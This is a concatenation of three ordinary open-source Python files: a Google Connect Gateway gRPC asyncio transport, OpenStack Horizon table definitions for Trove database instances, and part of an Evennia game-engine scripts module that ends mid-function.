# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.api import httpbody_pb2 # type: ignore
from .base import GatewayServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import GatewayServiceGrpcTransport
class GatewayServiceGrpcAsyncIOTransport(GatewayServiceTransport):
"""gRPC AsyncIO backend transport for GatewayService.
Gateway service is a public API which works as a Kubernetes
resource model proxy between end users and registered Kubernetes
clusters. Each RPC in this service matches with an HTTP verb.
End user will initiate kubectl commands against the Gateway
service, and Gateway service will forward user requests to
clusters.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(
cls,
host: str = "connectgateway.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
def __init__(
self,
*,
host: str = "connectgateway.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def get_resource(
self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
r"""Return a callable for the get resource method over gRPC.
GetResource performs an HTTP GET request on the
Kubernetes API Server.
Returns:
Callable[[~.HttpBody],
Awaitable[~.HttpBody]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_resource" not in self._stubs:
self._stubs["get_resource"] = self.grpc_channel.unary_unary(
"/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/GetResource",
request_serializer=httpbody_pb2.HttpBody.SerializeToString,
response_deserializer=httpbody_pb2.HttpBody.FromString,
)
return self._stubs["get_resource"]
@property
def post_resource(
self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
r"""Return a callable for the post resource method over gRPC.
PostResource performs an HTTP POST on the Kubernetes
API Server.
Returns:
Callable[[~.HttpBody],
Awaitable[~.HttpBody]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "post_resource" not in self._stubs:
self._stubs["post_resource"] = self.grpc_channel.unary_unary(
"/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/PostResource",
request_serializer=httpbody_pb2.HttpBody.SerializeToString,
response_deserializer=httpbody_pb2.HttpBody.FromString,
)
return self._stubs["post_resource"]
@property
def delete_resource(
self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
r"""Return a callable for the delete resource method over gRPC.
DeleteResource performs an HTTP DELETE on the
Kubernetes API Server.
Returns:
Callable[[~.HttpBody],
Awaitable[~.HttpBody]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_resource" not in self._stubs:
self._stubs["delete_resource"] = self.grpc_channel.unary_unary(
"/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/DeleteResource",
request_serializer=httpbody_pb2.HttpBody.SerializeToString,
response_deserializer=httpbody_pb2.HttpBody.FromString,
)
return self._stubs["delete_resource"]
@property
def put_resource(
self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
r"""Return a callable for the put resource method over gRPC.
PutResource performs an HTTP PUT on the Kubernetes
API Server.
Returns:
Callable[[~.HttpBody],
Awaitable[~.HttpBody]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "put_resource" not in self._stubs:
self._stubs["put_resource"] = self.grpc_channel.unary_unary(
"/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/PutResource",
request_serializer=httpbody_pb2.HttpBody.SerializeToString,
response_deserializer=httpbody_pb2.HttpBody.FromString,
)
return self._stubs["put_resource"]
@property
def patch_resource(
self,
) -> Callable[[httpbody_pb2.HttpBody], Awaitable[httpbody_pb2.HttpBody]]:
r"""Return a callable for the patch resource method over gRPC.
PatchResource performs an HTTP PATCH on the
Kubernetes API Server.
Returns:
Callable[[~.HttpBody],
Awaitable[~.HttpBody]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "patch_resource" not in self._stubs:
self._stubs["patch_resource"] = self.grpc_channel.unary_unary(
"/google.cloud.gkeconnect.gateway.v1beta1.GatewayService/PatchResource",
request_serializer=httpbody_pb2.HttpBody.SerializeToString,
response_deserializer=httpbody_pb2.HttpBody.FromString,
)
return self._stubs["patch_resource"]
def close(self):
return self.grpc_channel.close()
__all__ = ("GatewayServiceGrpcAsyncIOTransport",)
| |
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core import urlresolvers
from django.template import defaultfilters as d_filters
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ungettext_lazy
from horizon import exceptions
from horizon import messages
from horizon import tables
from horizon.templatetags import sizeformat
from horizon.utils import filters
from openstack_dashboard.contrib.trove import api
from openstack_dashboard.contrib.trove.content.database_backups \
import tables as backup_tables
ACTIVE_STATES = ("ACTIVE",)
class DeleteInstance(tables.BatchAction):
help_text = _("Deleted instances are not recoverable.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Instance",
u"Delete Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Scheduled deletion of Instance",
u"Scheduled deletion of Instances",
count
)
name = "delete"
classes = ("btn-danger", )
icon = "remove"
def action(self, request, obj_id):
api.trove.instance_delete(request, obj_id)
class RestartInstance(tables.BatchAction):
help_text = _("Restarted instances will lose any data not"
" saved in persistent storage.")
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Restart Instance",
u"Restart Instances",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Restarted Instance",
u"Restarted Instances",
count
)
name = "restart"
classes = ('btn-danger', 'btn-reboot')
def allowed(self, request, instance=None):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTDOWN'
or instance.status == 'RESTART_REQUIRED'))
def action(self, request, obj_id):
api.trove.instance_restart(request, obj_id)
class DetachReplica(tables.BatchAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Detach Replica",
u"Detach Replicas",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Replica Detached",
u"Replicas Detached",
count
)
name = "detach_replica"
classes = ('btn-danger', 'btn-detach-replica')
def allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES
and hasattr(instance, 'replica_of'))
def action(self, request, obj_id):
api.trove.instance_detach_replica(request, obj_id)
class PromoteToReplicaSource(tables.LinkAction):
name = "promote_to_replica_source"
verbose_name = _("Promote to Replica Source")
url = "horizon:project:databases:promote_to_replica_source"
classes = ("ajax-modal", "btn-promote-to-replica-source")
def allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES
and hasattr(instance, 'replica_of'))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
class EjectReplicaSource(tables.BatchAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Eject Replica Source",
u"Eject Replica Sources",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Ejected Replica Source",
u"Ejected Replica Sources",
count
)
name = "eject_replica_source"
classes = ('btn-danger', 'btn-eject-replica-source')
def _allowed(self, request, instance=None):
return (hasattr(instance, 'replicas'))
def action(self, request, obj_id):
api.trove.eject_replica_source(request, obj_id)
class GrantAccess(tables.BatchAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Grant Access",
u"Grant Access",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Granted Access",
u"Granted Access",
count
)
name = "grant_access"
classes = ('btn-grant-access')
def allowed(self, request, instance=None):
if instance and instance.access:
return False
return True
def action(self, request, obj_id):
instance_id = self.table.kwargs['instance_id']
user_name = self.table.kwargs['user_name']
api.trove.user_grant_access(
request, instance_id, user_name, [obj_id], None)
class RevokeAccess(tables.BatchAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Revoke Access",
u"Revoke Access",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Access Revoked",
u"Access Revoked",
count
)
name = "revoke_access"
classes = ('btn-revoke-access')
def allowed(self, request, instance=None):
if instance and not instance.access:
return False
return True
def action(self, request, obj_id):
instance_id = self.table.kwargs['instance_id']
user_name = self.table.kwargs['user_name']
api.trove.user_revoke_access(
request, instance_id, user_name, obj_id, None)
class AccessTable(tables.DataTable):
dbname = tables.Column("name", verbose_name=_("Name"))
access = tables.Column("access", verbose_name=_("Access"))
class Meta(object):
name = "access"
verbose_name = _("Database Access")
row_actions = (GrantAccess, RevokeAccess)
def get_object_id(self, datum):
return datum.name
class ManageAccess(tables.LinkAction):
name = "manage_access"
verbose_name = _("Manage Access")
url = "horizon:project:databases:access_detail"
icon = "pencil"
def get_link_url(self, datum):
user = datum
return urlresolvers.reverse(self.url, args=[user.instance.id,
user.name])
class CreateUser(tables.LinkAction):
name = "create_user"
verbose_name = _("Create User")
url = "horizon:project:databases:create_user"
classes = ("ajax-modal",)
icon = "plus"
def allowed(self, request, instance=None):
instance = self.table.kwargs['instance']
return (instance.status in ACTIVE_STATES)
def get_link_url(self, datum=None):
instance_id = self.table.kwargs['instance_id']
return urlresolvers.reverse(self.url, args=[instance_id])
class EditUser(tables.LinkAction):
name = "edit_user"
verbose_name = _("Edit User")
url = "horizon:project:databases:edit_user"
classes = ("ajax-modal",)
icon = "pencil"
def allowed(self, request, instance=None):
instance = self.table.kwargs['instance']
return (instance.status in ACTIVE_STATES)
def get_link_url(self, datum):
user = datum
return urlresolvers.reverse(self.url, args=[user.instance.id,
user.name])
class DeleteUser(tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete User",
u"Delete Users",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted User",
u"Deleted Users",
count
)
def delete(self, request, obj_id):
datum = self.table.get_object_by_id(obj_id)
api.trove.user_delete(request, datum.instance.id, datum.name)
class CreateDatabase(tables.LinkAction):
name = "create_database"
verbose_name = _("Create Database")
url = "horizon:project:databases:create_database"
classes = ("ajax-modal",)
icon = "plus"
def allowed(self, request, instance=None):
instance = self.table.kwargs['instance']
return (instance.status in ACTIVE_STATES and
request.user.has_perm('openstack.services.object-store'))
def get_link_url(self, datum=None):
instance_id = self.table.kwargs['instance_id']
return urlresolvers.reverse(self.url, args=[instance_id])
class DeleteDatabase(tables.DeleteAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Delete Database",
u"Delete Databases",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Deleted Database",
u"Deleted Databases",
count
)
def delete(self, request, obj_id):
datum = self.table.get_object_by_id(obj_id)
try:
api.trove.database_delete(request, datum.instance.id, datum.name)
except Exception:
msg = _('Error deleting database on instance.')
exceptions.handle(request, msg)
class LaunchLink(tables.LinkAction):
name = "launch"
verbose_name = _("Launch Instance")
url = "horizon:project:databases:launch"
classes = ("ajax-modal", "btn-launch")
icon = "cloud-upload"
class CreateBackup(tables.LinkAction):
name = "backup"
verbose_name = _("Create Backup")
url = "horizon:project:database_backups:create"
classes = ("ajax-modal",)
icon = "camera"
def allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES and
request.user.has_perm('openstack.services.object-store'))
def get_link_url(self, datam):
url = urlresolvers.reverse(self.url)
return url + "?instance=%s" % datam.id
class ResizeVolume(tables.LinkAction):
name = "resize_volume"
verbose_name = _("Resize Volume")
url = "horizon:project:databases:resize_volume"
classes = ("ajax-modal", "btn-resize")
def allowed(self, request, instance=None):
return instance.status in ACTIVE_STATES
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
class ResizeInstance(tables.LinkAction):
name = "resize_instance"
verbose_name = _("Resize Instance")
url = "horizon:project:databases:resize_instance"
classes = ("ajax-modal", "btn-resize")
def allowed(self, request, instance=None):
return ((instance.status in ACTIVE_STATES
or instance.status == 'SHUTOFF'))
def get_link_url(self, datum):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
class AttachConfiguration(tables.LinkAction):
name = "attach_configuration"
verbose_name = _("Attach Configuration Group")
url = "horizon:project:databases:attach_config"
classes = ("btn-attach-config", "ajax-modal")
def allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES
and not hasattr(instance, 'configuration'))
class DetachConfiguration(tables.BatchAction):
@staticmethod
def action_present(count):
return ungettext_lazy(
u"Detach Configuration Group",
u"Detach Configuration Groups",
count
)
@staticmethod
def action_past(count):
return ungettext_lazy(
u"Detached Configuration Group",
u"Detached Configuration Groups",
count
)
name = "detach_configuration"
classes = ('btn-danger', 'btn-detach-config')
def _allowed(self, request, instance=None):
return (instance.status in ACTIVE_STATES
and hasattr(instance, 'configuration'))
def action(self, request, obj_id):
api.trove.instance_detach_configuration(request, obj_id)
class EnableRootAction(tables.Action):
name = "enable_root_action"
verbose_name = _("Enable Root")
def handle(self, table, request, obj_ids):
try:
username, password = api.trove.root_enable(request, obj_ids)
table.data[0].enabled = True
table.data[0].password = password
except Exception:
messages.error(request, _('There was a problem enabling root.'))
class DisableRootAction(tables.Action):
name = "disable_root_action"
verbose_name = _("Disable Root")
def allowed(self, request, instance):
enabled = api.trove.root_show(request, instance.id)
return enabled.rootEnabled
def single(self, table, request, object_id):
try:
api.trove.root_disable(request, object_id)
table.data[0].password = None
messages.success(request, _("Successfully disabled root access."))
except Exception as e:
messages.warning(request,
_("Cannot disable root access: %s") % e.message)
class ManageRoot(tables.LinkAction):
name = "manage_root_action"
verbose_name = _("Manage Root Access")
url = "horizon:project:databases:manage_root"
def allowed(self, request, instance):
return instance.status in ACTIVE_STATES
def get_link_url(self, datum=None):
instance_id = self.table.get_object_id(datum)
return urlresolvers.reverse(self.url, args=[instance_id])
class ManageRootTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Instance Name'))
enabled = tables.Column('enabled', verbose_name=_('Root Has Been Enabled'),
filters=(d_filters.yesno, d_filters.capfirst),
help_text=_("Status if root was ever enabled "
"for an instance."))
password = tables.Column('password', verbose_name=_('Password'),
help_text=_("Password is only visible "
"immediately after the root is "
"enabled or reset."))
class Meta(object):
name = "manage_root"
verbose_name = _("Manage Root")
row_actions = (EnableRootAction, DisableRootAction,)
class UpdateRow(tables.Row):
ajax = True
def get_data(self, request, instance_id):
instance = api.trove.instance_get(request, instance_id)
try:
flavor_id = instance.flavor['id']
instance.full_flavor = api.trove.flavor_get(request, flavor_id)
except Exception:
pass
instance.host = get_host(instance)
return instance
def get_datastore(instance):
if hasattr(instance, "datastore"):
return instance.datastore["type"]
return _("Not available")
def get_datastore_version(instance):
if hasattr(instance, "datastore"):
return instance.datastore["version"]
return _("Not available")
def get_host(instance):
if hasattr(instance, "hostname"):
return instance.hostname
elif hasattr(instance, "ip") and instance.ip:
return instance.ip[0]
return _("Not Assigned")
def get_size(instance):
if hasattr(instance, "full_flavor"):
size_string = _("%(name)s | %(RAM)s RAM")
vals = {'name': instance.full_flavor.name,
'RAM': sizeformat.mb_float_format(instance.full_flavor.ram)}
return size_string % vals
return _("Not available")
def get_volume_size(instance):
if hasattr(instance, "volume"):
return sizeformat.diskgbformat(instance.volume.get("size"))
return _("Not available")
def get_databases(user):
if hasattr(user, "access"):
databases = [db.name for db in user.access]
databases.sort()
return ', '.join(databases)
return _("-")
class InstancesTable(tables.DataTable):
STATUS_CHOICES = (
("ACTIVE", True),
("BLOCKED", True),
("BUILD", None),
("FAILED", False),
("REBOOT", None),
("RESIZE", None),
("BACKUP", None),
("SHUTDOWN", False),
("ERROR", False),
("RESTART_REQUIRED", None),
)
STATUS_DISPLAY_CHOICES = (
("ACTIVE", pgettext_lazy("Current status of a Database Instance",
u"Active")),
("BLOCKED", pgettext_lazy("Current status of a Database Instance",
u"Blocked")),
("BUILD", pgettext_lazy("Current status of a Database Instance",
u"Build")),
("FAILED", pgettext_lazy("Current status of a Database Instance",
u"Failed")),
("REBOOT", pgettext_lazy("Current status of a Database Instance",
u"Reboot")),
("RESIZE", pgettext_lazy("Current status of a Database Instance",
u"Resize")),
("BACKUP", pgettext_lazy("Current status of a Database Instance",
u"Backup")),
("SHUTDOWN", pgettext_lazy("Current status of a Database Instance",
u"Shutdown")),
("ERROR", pgettext_lazy("Current status of a Database Instance",
u"Error")),
("RESTART_REQUIRED",
pgettext_lazy("Current status of a Database Instance",
u"Restart Required")),
)
name = tables.Column("name",
link="horizon:project:databases:detail",
verbose_name=_("Instance Name"))
datastore = tables.Column(get_datastore,
verbose_name=_("Datastore"))
datastore_version = tables.Column(get_datastore_version,
verbose_name=_("Datastore Version"))
host = tables.Column(get_host, verbose_name=_("Host"))
size = tables.Column(get_size,
verbose_name=_("Size"),
attrs={'data-type': 'size'})
volume = tables.Column(get_volume_size,
verbose_name=_("Volume Size"),
attrs={'data-type': 'size'})
status = tables.Column("status",
verbose_name=_("Status"),
status=True,
status_choices=STATUS_CHOICES,
display_choices=STATUS_DISPLAY_CHOICES)
class Meta(object):
name = "databases"
verbose_name = _("Instances")
status_columns = ["status"]
row_class = UpdateRow
table_actions = (LaunchLink, DeleteInstance)
row_actions = (CreateBackup,
ResizeVolume,
ResizeInstance,
AttachConfiguration,
DetachConfiguration,
PromoteToReplicaSource,
EjectReplicaSource,
ManageRoot,
RestartInstance,
DetachReplica,
DeleteInstance)
class UsersTable(tables.DataTable):
name = tables.Column("name", verbose_name=_("User Name"))
host = tables.Column("host", verbose_name=_("Allowed Host"))
databases = tables.Column(get_databases, verbose_name=_("Databases"))
class Meta(object):
name = "users"
verbose_name = _("Users")
table_actions = [CreateUser, DeleteUser]
row_actions = [EditUser, ManageAccess, DeleteUser]
def get_object_id(self, datum):
return datum.name
class DatabaseTable(tables.DataTable):
name = tables.Column("name", verbose_name=_("Database Name"))
class Meta(object):
name = "databases"
verbose_name = _("Databases")
table_actions = [CreateDatabase, DeleteDatabase]
row_actions = [DeleteDatabase]
def get_object_id(self, datum):
return datum.name
def is_incremental(obj):
return hasattr(obj, 'parent_id') and obj.parent_id is not None
class InstanceBackupsTable(tables.DataTable):
name = tables.Column("name",
link="horizon:project:database_backups:detail",
verbose_name=_("Name"))
created = tables.Column("created", verbose_name=_("Created"),
filters=[filters.parse_isotime])
location = tables.Column(lambda obj: _("Download"),
link=lambda obj: obj.locationRef,
verbose_name=_("Backup File"))
incremental = tables.Column(is_incremental,
verbose_name=_("Incremental"),
filters=(d_filters.yesno,
d_filters.capfirst))
status = tables.Column(
"status",
verbose_name=_("Status"),
status=True,
status_choices=backup_tables.STATUS_CHOICES,
display_choices=backup_tables.STATUS_DISPLAY_CHOICES)
class Meta(object):
name = "backups"
verbose_name = _("Backups")
status_columns = ["status"]
row_class = UpdateRow
table_actions = (backup_tables.LaunchLink, backup_tables.DeleteBackup)
row_actions = (backup_tables.RestoreLink, backup_tables.DeleteBackup)
class ConfigDefaultsTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Property'))
value = tables.Column('value', verbose_name=_('Value'))
class Meta(object):
name = 'config_defaults'
verbose_name = _('Configuration Defaults')
def get_object_id(self, datum):
return datum.name
| |
"""
This module defines Scripts, out-of-character entities that can store
data both on themselves and on other objects while also having the
ability to run timers.
"""
from twisted.internet.defer import Deferred, maybeDeferred
from twisted.internet.task import LoopingCall
from django.core.exceptions import ObjectDoesNotExist
from django.utils.translation import ugettext as _
from evennia.typeclasses.models import TypeclassBase
from evennia.scripts.models import ScriptDB
from evennia.scripts.manager import ScriptManager
from evennia.utils import logger
from future.utils import with_metaclass
__all__ = ["DefaultScript", "DoNothing", "Store"]
class ExtendedLoopingCall(LoopingCall):
"""
LoopingCall that can start at a delay different
than `self.interval`.
"""
start_delay = None
callcount = 0
def start(self, interval, now=True, start_delay=None, count_start=0):
"""
Start running function every interval seconds.
This overloads the LoopingCall default by offering the
start_delay keyword and ability to repeat.
Args:
interval (int): Repeat interval in seconds.
now (bool, optional): Whether to start immediately or after
`start_delay` seconds.
start_delay (int): The number of seconds before starting.
If None, wait interval seconds. Only valid if `now` is `False`.
It is used as a way to start with a variable start time
after a pause.
count_start (int): Number of repeats to start at. The count
goes up every time the system repeats. This is used to
implement something repeating `N` number of times etc.
Raises:
AssertError: if trying to start a task which is already running.
ValueError: If interval is set to an invalid value < 0.
Notes:
As opposed to Twisted's inbuilt count mechanism, this
system will count also if force_repeat() was called rather
than just the number of `interval` seconds since the start.
This allows us to force-step through a limited number of
steps if we want.
"""
assert not self.running, ("Tried to start an already running "
"ExtendedLoopingCall.")
if interval < 0:
raise ValueError("interval must be >= 0")
self.running = True
deferred = self._deferred = Deferred()
self.starttime = self.clock.seconds()
self.interval = interval
self._runAtStart = now
self.callcount = max(0, count_start)
self.start_delay = start_delay if start_delay is None else max(0, start_delay)
if now:
# run immediately
self()
elif start_delay is not None and start_delay >= 0:
# start after some time: for this to work we need to
# trick _scheduleFrom by temporarily setting a different
# self.interval for it to check.
real_interval, self.interval = self.interval, start_delay
self._scheduleFrom(self.starttime)
# re-set the actual interval (this will be picked up
# next time it runs
self.interval = real_interval
else:
self._scheduleFrom(self.starttime)
return deferred
def __call__(self):
"""
Tick one step. We update callcount (tracks number of calls) as
well as null start_delay (needed in order to correctly
estimate next_call_time at all times).
"""
self.callcount += 1
if self.start_delay:
self.start_delay = None
self.starttime = self.clock.seconds()
LoopingCall.__call__(self)
def force_repeat(self):
"""
Force-fire the callback
Raises:
AssertionError: When trying to force a task that is not
running.
"""
assert self.running, ("Tried to fire an ExtendedLoopingCall "
"that was not running.")
self.call.cancel()
self.call = None
self.starttime = self.clock.seconds()
self()
def next_call_time(self):
"""
Get the next call time. This also takes the eventual effect
of start_delay into account.
Returns:
next (int or None): The time in seconds until the next call. This
takes `start_delay` into account. Returns `None` if
the task is not running.
"""
if self.running:
total_runtime = self.clock.seconds() - self.starttime
interval = self.start_delay or self.interval
return interval - (total_runtime % self.interval)
return None
class ScriptBase(with_metaclass(TypeclassBase, ScriptDB)):
"""
Base class for scripts. Don't inherit from this, inherit from the
class `DefaultScript` below instead.
"""
objects = ScriptManager()
class DefaultScript(ScriptBase):
"""
This is the base TypeClass for all Scripts. Scripts describe
events, timers and states in game, they can have a time component
or describe a state that changes under certain conditions.
"""
def __eq__(self, other):
"""
Compares two Scripts. Compares dbids.
Args:
other (Script): A script to compare with.
"""
try:
return other.dbid == self.dbid
except Exception:
return False
def _start_task(self):
"""
Start task runner.
"""
self.ndb._task = ExtendedLoopingCall(self._step_task)
if self.db._paused_time:
# the script was paused; restarting
callcount = self.db._paused_callcount or 0
self.ndb._task.start(self.db_interval,
now=False,
start_delay=self.db._paused_time,
count_start=callcount)
del self.db._paused_time
del self.db._paused_repeats
else:
# starting script anew
self.ndb._task.start(self.db_interval,
now=not self.db_start_delay)
def _stop_task(self):
"""
Stop task runner
"""
task = self.ndb._task
if task and task.running:
task.stop()
def _step_errback(self, e):
"""
Callback for runner errors
"""
cname = self.__class__.__name__
estring = _("Script %(key)s(#%(dbid)s) of type '%(cname)s': at_repeat() error '%(err)s'.") % \
{"key": self.key, "dbid": self.dbid, "cname": cname,
"err": e.getErrorMessage()}
try:
self.db_obj.msg(estring)
except Exception:
